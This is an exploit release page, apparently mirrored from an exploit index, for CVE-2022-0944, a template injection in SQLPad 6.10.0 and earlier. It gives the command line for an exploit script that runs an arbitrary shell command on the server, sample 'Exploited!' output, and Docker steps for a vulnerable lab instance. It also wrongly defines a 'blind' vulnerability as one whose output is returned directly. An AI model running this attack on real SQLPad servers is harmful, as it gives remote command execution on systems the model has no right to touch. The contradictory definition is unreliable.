## https://sploitus.com/exploit?id=176DA5A5-F5AA-5BEE-866B-FDFA1B015F7A
# CVE-2022-0944
SQLPad - Template injection
This is a blind vulnerability, meaning that the output is directly returned in the response.
## Exploit
Use the script with the following command:
`python3 exploit.py --url http://localhost:13000 --command 'ls -la > /tmp/test' --username admin --password password`
### Output
```
[*] Login was successfull
[*] Exploited!
```
## Testing environment
Using docker:
- Start the docker container - `sudo docker run -p 13000:3000 -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=password --name vulnerable-sqlpad sqlpad/sqlpad:6.10.0`
- Connect to the docker container - `sudo docker exec -it vulnerable-sqlpad /bin/bash`
To access the web interface, use URL `http://localhost:13000` with credentials `admin:password`.
## Affected versions
<= 6.10.0
## Source
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
## Disclaimer
Use only for educational purposes or CTF challenges.